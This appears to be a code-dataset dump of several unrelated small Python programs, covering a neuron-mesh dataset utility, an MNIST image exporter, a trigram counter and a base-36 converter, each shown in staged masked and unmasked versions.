vertex_fname = "{pref}{i}_vertices.ply".format(pref=output_prefix, i=i) if os.path.dirname(vertex_fname) == "": vertex_fname = "./" + vertex_fname mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)
normal
{ "blob_id": "fd0db093b72dad4657d71788405fcca4ba55daff", "index": 8529, "step-1": "<mask token>\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\n<mask token>\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\n<mask token>\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-2": "<mask token>\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=['obj', 'h5']):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f'*.{ext}')\n filenames.extend(glob.glob(ext_expr))\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\n<mask token>\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-3": "__doc__ = \"\"\"\nDataset Module Utilities - mostly for handling files and datasets\n\"\"\"\n<mask token>\nSVEN_BASE = 'seungmount/research/svenmd'\nNICK_BASE = 'seungmount/research/Nick/'\nBOTH_BASE = 'seungmount/research/nick_and_sven'\nDATASET_DIRS = {'orig_full_cells': [\n f'{SVEN_BASE}/pointnet_axoness_gt_180223/'], 'soma_vs_rest': [\n f'{SVEN_BASE}/pointnet_soma_masked_180401'], 'orphans': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/'], 'orphans2': [\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_axons',\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/'],\n 'orphan_axons': [f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/'],\n 'orphan_axons_refined': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308_refined/'],\n 'pinky100_orphan_dends': [f'{BOTH_BASE}/data/180920_orphan_dends/'],\n 'orphan_axons_pinky100': [f'{SVEN_BASE}/InhAnalysis/meshes_put_axon/'],\n 'fish_refined': [f'{SVEN_BASE}/180831_meshes_ashwin_refined/'],\n 'full_cells_unrefined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401'],\n 'full_cells_refined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401_refined/'],\n 'pinky100_orphan_dend_features': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer/inference/proj32/'],\n 'pinky100_orphan_dend_features_32': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer_32/inference/'], 'default':\n [f'{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/',\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/']}\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=['obj', 'h5']):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f'*.{ext}')\n filenames.extend(glob.glob(ext_expr))\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\ndef pull_n_samples(dset, n):\n \"\"\"Pulls n random samples from a dataset object\"\"\"\n return list(dset[i] for i in random.sample(range(len(dset)), n))\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-4": "__doc__ = \"\"\"\nDataset Module Utilities - mostly for handling files and datasets\n\"\"\"\nimport glob\nimport os\nimport random\nfrom meshparty import mesh_io\nSVEN_BASE = 'seungmount/research/svenmd'\nNICK_BASE = 'seungmount/research/Nick/'\nBOTH_BASE = 'seungmount/research/nick_and_sven'\nDATASET_DIRS = {'orig_full_cells': [\n f'{SVEN_BASE}/pointnet_axoness_gt_180223/'], 'soma_vs_rest': [\n f'{SVEN_BASE}/pointnet_soma_masked_180401'], 'orphans': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/'], 'orphans2': [\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_axons',\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/'],\n 'orphan_axons': [f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/'],\n 'orphan_axons_refined': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308_refined/'],\n 'pinky100_orphan_dends': [f'{BOTH_BASE}/data/180920_orphan_dends/'],\n 'orphan_axons_pinky100': [f'{SVEN_BASE}/InhAnalysis/meshes_put_axon/'],\n 'fish_refined': [f'{SVEN_BASE}/180831_meshes_ashwin_refined/'],\n 'full_cells_unrefined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401'],\n 'full_cells_refined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401_refined/'],\n 'pinky100_orphan_dend_features': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer/inference/proj32/'],\n 'pinky100_orphan_dend_features_32': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer_32/inference/'], 'default':\n [f'{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/',\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/']}\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=['obj', 'h5']):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f'*.{ext}')\n filenames.extend(glob.glob(ext_expr))\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\ndef pull_n_samples(dset, n):\n \"\"\"Pulls n random samples from a dataset object\"\"\"\n return list(dset[i] for i in random.sample(range(len(dset)), n))\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-5": "__doc__ = \"\"\"\nDataset Module Utilities - mostly for handling files and datasets\n\"\"\"\nimport glob\nimport os\nimport random\n\nfrom meshparty import mesh_io\n\n\n# Datasets -----------------------\nSVEN_BASE = \"seungmount/research/svenmd\"\nNICK_BASE = \"seungmount/research/Nick/\"\nBOTH_BASE = \"seungmount/research/nick_and_sven\"\nDATASET_DIRS = {\n \"orig_full_cells\": [f\"{SVEN_BASE}/pointnet_axoness_gt_180223/\"],\n\n \"soma_vs_rest\": [f\"{SVEN_BASE}/pointnet_soma_masked_180401\"],\n\n \"orphans\": [f\"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/\",\n f\"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/\"],\n\n \"orphans2\": [f\"{NICK_BASE}/pointnet/orphan_dataset/train_val_axons\",\n f\"{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/\"],\n\n \"orphan_axons\": [f\"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/\"],\n\n \"orphan_axons_refined\": [(f\"{SVEN_BASE}\"\n \"/pointnet_orphan_axons_gt_180308_refined/\")],\n\n \"pinky100_orphan_dends\": [(f\"{BOTH_BASE}/data/180920_orphan_dends/\")],\n\n \"orphan_axons_pinky100\": [(f\"{SVEN_BASE}/InhAnalysis/meshes_put_axon/\")],\n\n \"fish_refined\": [f\"{SVEN_BASE}/180831_meshes_ashwin_refined/\"],\n\n \"full_cells_unrefined\": [(f\"{SVEN_BASE}\"\n \"/pointnet_full_semantic_labels\"\n \"_masked_180401\")],\n\n \"full_cells_refined\": [(f\"{SVEN_BASE}\"\n \"/pointnet_full_semantic_labels\"\n \"_masked_180401_refined/\")],\n\n \"pinky100_orphan_dend_features\": [(f\"{BOTH_BASE}\"\n \"/nick_archive/p100_dend_outer\"\n \"/inference/proj32/\")],\n\n \"pinky100_orphan_dend_features_32\": [(f\"{BOTH_BASE}\"\n \"/nick_archive/p100_dend_outer_32\"\n \"/inference/\")],\n\n \"default\": [f\"{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/\",\n f\"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/\",\n f\"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/\"]\n}\n# --------------------------------\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert (dset_name is None) or (dset_name in DATASET_DIRS), \"invalid name\"\n\n dset_name = \"default\" if dset_name is None else dset_name\n\n home = os.path.expanduser(\"~\")\n\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=[\"obj\", \"h5\"]):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f\"*.{ext}\")\n filenames.extend(glob.glob(ext_expr))\n\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8,\n val_split=0.1, test_split=0.1, seed=None):\n\n if seed is not None:\n random.seed(seed)\n\n # Normalizing splits for arbitrary values\n total = train_split + val_split + test_split\n\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n\n permutation = random.sample(filenames, len(filenames))\n\n train_files = permutation[:n_train]\n val_files = permutation[n_train:(n_train+n_val)]\n test_files = permutation[(n_train+n_val):]\n\n return train_files, val_files, test_files\n\n\n# Helper functions for testing (e.g. sample.py)\ndef pull_n_samples(dset, n):\n \"\"\"Pulls n random samples from a dataset object\"\"\"\n return list(dset[i] for i in random.sample(range(len(dset)), n))\n\n\ndef save_samples(samples, output_prefix=\"sample\"):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n\n for (i, vertices) in enumerate(samples):\n vertex_fname = \"{pref}{i}_vertices.ply\".format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == \"\":\n vertex_fname = \"./\" + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-ids": [ 3, 4, 6, 7, 8 ] }
[ 3, 4, 6, 7, 8 ]
import os import urllib.request import zipfile import tarfile import matplotlib.pyplot as plt %matplotlib inline from PIL import Image import numpy as np # フォルダ「data」が存在しない場合は作成する data_dir = "./data/" if not os.path.exists(data_dir): os.mkdir(data_dir) # MNIStをダウンロードして読み込む from sklearn.datasets import fetch_openml mnist = fetch_openml("mnist_784", version = 1, data_home = "./data") data_dir_path = "./data/img_78/" if not os.path.exists(data_dir_path): os.mkdir(data_dir_path) # MNIST1から数字の7, 8の画像だけフォルダ img_78に保存するよ count_7 = 0 count_8 = 0 N = 200 # 200枚ずつ作成 X = mnist.data y = mnist.target for i in range(len(X)): # generate image of 7 if (y[i] is "7") and (count_7 < N): file_path = "./data/img_78/img_7_" + str(count_7) + ".jpg" im_f = (X[i].reshape(28, 28)) pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大 pil_img_f.save(file_path) # 保存 count7+=1 # 画像8の作成 if (y[i] is "8") and (count8<max_num): file_path="./data/img_78/img_8_"+str(count_8)+".jpg" im_f=(X[i].reshape(28, 28)) # 画像を28*28の形に変形 pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大 pil_img_f.save(file_path) # 保存 count8+=1
normal
{ "blob_id": "6f53a989ddf179b699186a78b5d8cf6d3d08cbb2", "index": 4756, "step-1": "import os\nimport urllib.request\nimport zipfile\nimport tarfile\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\nfrom PIL import Image\nimport numpy as np\n\n# フォルダ「data」が存在しない場合は作成する\ndata_dir = \"./data/\"\nif not os.path.exists(data_dir):\n os.mkdir(data_dir)\n\n# MNIStをダウンロードして読み込む\nfrom sklearn.datasets import fetch_openml\nmnist = fetch_openml(\"mnist_784\", version = 1, data_home = \"./data\")\n\ndata_dir_path = \"./data/img_78/\"\nif not os.path.exists(data_dir_path):\n os.mkdir(data_dir_path)\n\n# MNIST1から数字の7, 8の画像だけフォルダ img_78に保存するよ\n\ncount_7 = 0\ncount_8 = 0\nN = 200 # 200枚ずつ作成\n\nX = mnist.data\ny = mnist.target\n\n\nfor i in range(len(X)):\n\n # generate image of 7\n if (y[i] is \"7\") and (count_7 < N):\n file_path = \"./data/img_78/img_7_\" + str(count_7) + \".jpg\"\n im_f = (X[i].reshape(28, 28))\n pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに\n pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大\n pil_img_f.save(file_path) # 保存\n count7+=1 \n \n # 画像8の作成\n if (y[i] is \"8\") and (count8<max_num):\n file_path=\"./data/img_78/img_8_\"+str(count_8)+\".jpg\"\n im_f=(X[i].reshape(28, 28)) # 画像を28*28の形に変形\n pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに\n pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大\n pil_img_f.save(file_path) # 保存\n count8+=1 ", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from xai.brain.wordbase.nouns._teleconference import _TELECONFERENCE #calss header class _TELECONFERENCES(_TELECONFERENCE, ): def __init__(self,): _TELECONFERENCE.__init__(self) self.name = "TELECONFERENCES" self.specie = 'nouns' self.basic = "teleconference" self.jsondata = {}
normal
{ "blob_id": "9021fa440561461ee179f333aa04a155d06c6e86", "index": 7255, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass _TELECONFERENCES(_TELECONFERENCE):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass _TELECONFERENCES(_TELECONFERENCE):\n\n def __init__(self):\n _TELECONFERENCE.__init__(self)\n self.name = 'TELECONFERENCES'\n self.specie = 'nouns'\n self.basic = 'teleconference'\n self.jsondata = {}\n", "step-4": "from xai.brain.wordbase.nouns._teleconference import _TELECONFERENCE\n\n\nclass _TELECONFERENCES(_TELECONFERENCE):\n\n def __init__(self):\n _TELECONFERENCE.__init__(self)\n self.name = 'TELECONFERENCES'\n self.specie = 'nouns'\n self.basic = 'teleconference'\n self.jsondata = {}\n", "step-5": "\n\nfrom xai.brain.wordbase.nouns._teleconference import _TELECONFERENCE\n\n#calss header\nclass _TELECONFERENCES(_TELECONFERENCE, ):\n\tdef __init__(self,): \n\t\t_TELECONFERENCE.__init__(self)\n\t\tself.name = \"TELECONFERENCES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"teleconference\"\n\t\tself.jsondata = {}\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def count_or_add_trigrams(trigram, trigrams_so_far): """ Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. """ for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far <|reserved_special_token_0|> for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count) <|reserved_special_token_1|> <|reserved_special_token_0|> def count_or_add_trigrams(trigram, trigrams_so_far): """ Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. """ for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far test_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d', 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']] trigram_count = [] for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count) <|reserved_special_token_1|> from pprint import pprint def count_or_add_trigrams(trigram, trigrams_so_far): """ Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. """ for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far test_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d', 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']] trigram_count = [] for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count) <|reserved_special_token_1|> # Head start. # ask me for this solution: 6cb9ce6024b5fd41aebb86ccd40d8080 # this line is not needed, just for better output: from pprint import pprint # just remove the top line def count_or_add_trigrams(trigram, trigrams_so_far): ''' Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. ''' for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far test_trigrams = [ ['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d', 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f'] ] trigram_count = [] for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count)
flexible
{ "blob_id": "753cc532e4d049bacff33c97de4d80bb9ab8ece8", "index": 2655, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef count_or_add_trigrams(trigram, trigrams_so_far):\n \"\"\"\n Takes a trigram, and a list of previously seen trigrams\n and yields the same list with all discovered and counted\n trigrams.\n Adds given trigram if not found,\n increments the trigram counter if found.\n \"\"\"\n for entry in trigrams_so_far:\n test_trigram = entry[0]\n if test_trigram == trigram:\n entry[1] += 1\n break\n else:\n trigrams_so_far.append([trigram, 1])\n return trigrams_so_far\n\n\n<mask token>\nfor trigram in test_trigrams:\n print('I have been given this trigram:', end=' ')\n pprint(trigram)\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\n print('After finishing this operation, my data looks like:')\n pprint(trigram_count)\n print('-------------------------------------------------------------')\nprint('After doing all test trigrams, this is what I have:')\npprint(trigram_count)\n", "step-3": "<mask token>\n\n\ndef count_or_add_trigrams(trigram, trigrams_so_far):\n \"\"\"\n Takes a trigram, and a list of previously seen trigrams\n and yields the same list with all discovered and counted\n trigrams.\n Adds given trigram if not found,\n increments the trigram counter if found.\n \"\"\"\n for entry in trigrams_so_far:\n test_trigram = entry[0]\n if test_trigram == trigram:\n entry[1] += 1\n break\n else:\n trigrams_so_far.append([trigram, 1])\n return trigrams_so_far\n\n\ntest_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d',\n 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']]\ntrigram_count = []\nfor trigram in test_trigrams:\n print('I have been given this trigram:', end=' ')\n pprint(trigram)\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\n print('After finishing this operation, my data looks like:')\n pprint(trigram_count)\n print('-------------------------------------------------------------')\nprint('After doing all test trigrams, this is what I have:')\npprint(trigram_count)\n", "step-4": "from pprint import pprint\n\n\ndef count_or_add_trigrams(trigram, trigrams_so_far):\n \"\"\"\n Takes a trigram, and a list of previously seen trigrams\n and yields the same list with all discovered and counted\n trigrams.\n Adds given trigram if not found,\n increments the trigram counter if found.\n \"\"\"\n for entry in trigrams_so_far:\n test_trigram = entry[0]\n if test_trigram == trigram:\n entry[1] += 1\n break\n else:\n trigrams_so_far.append([trigram, 1])\n return trigrams_so_far\n\n\ntest_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d',\n 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']]\ntrigram_count = []\nfor trigram in test_trigrams:\n print('I have been given this trigram:', end=' ')\n pprint(trigram)\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\n print('After finishing this operation, my data looks like:')\n pprint(trigram_count)\n print('-------------------------------------------------------------')\nprint('After doing all test trigrams, this is what I have:')\npprint(trigram_count)\n", "step-5": "# Head start.\r\n# ask me for this solution: 6cb9ce6024b5fd41aebb86ccd40d8080\r\n\r\n# this line is not needed, just for better output:\r\nfrom pprint import pprint\r\n# just remove the top line\r\n\r\ndef count_or_add_trigrams(trigram, trigrams_so_far):\r\n '''\r\n Takes a trigram, and a list of previously seen trigrams\r\n and yields the same list with all discovered and counted\r\n trigrams.\r\n Adds given trigram if not found,\r\n increments the trigram counter if found.\r\n '''\r\n\r\n for entry in trigrams_so_far:\r\n test_trigram = entry[0]\r\n if test_trigram == trigram:\r\n entry[1] += 1\r\n\r\n break\r\n\r\n else:\r\n trigrams_so_far.append([trigram, 1])\r\n return trigrams_so_far\r\n\r\n\r\ntest_trigrams = [\r\n ['a', 'b', 'c'],\r\n ['d', 'e', 'f'],\r\n ['b', 'd', 'e'],\r\n ['d', 'e', 'f'],\r\n ['a', 'a', 'a'],\r\n ['d', 'e', 'f']\r\n]\r\n\r\ntrigram_count = []\r\nfor trigram in test_trigrams:\r\n print('I have been given this trigram:', end=' ')\r\n pprint(trigram)\r\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\r\n print('After finishing this operation, my data looks like:')\r\n pprint(trigram_count)\r\n print('-------------------------------------------------------------')\r\n\r\nprint('After doing all test trigrams, this is what I have:')\r\npprint(trigram_count)\r\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
<|reserved_special_token_0|> def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print('position right to left is >', i + 1, 'value is ', BASE[ num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]]) dec += 36 ** i * BASE[num_lst[i]] return dec def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print('decimal value of BASE 36 number', num, 'is', dec) else: print('user terminated program') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for i, item in enumerate(WORD): BASE.update({WORD[i]: i}) def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print('position right to left is >', i + 1, 'value is ', BASE[ num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]]) dec += 36 ** i * BASE[num_lst[i]] return dec def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print('decimal value of BASE 36 number', num, 'is', dec) else: print('user terminated program') main() <|reserved_special_token_1|> <|reserved_special_token_0|> WORD = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' BASE = {} for i, item in enumerate(WORD): BASE.update({WORD[i]: i}) def enter_num(): """ get user input and do error checking for illegal 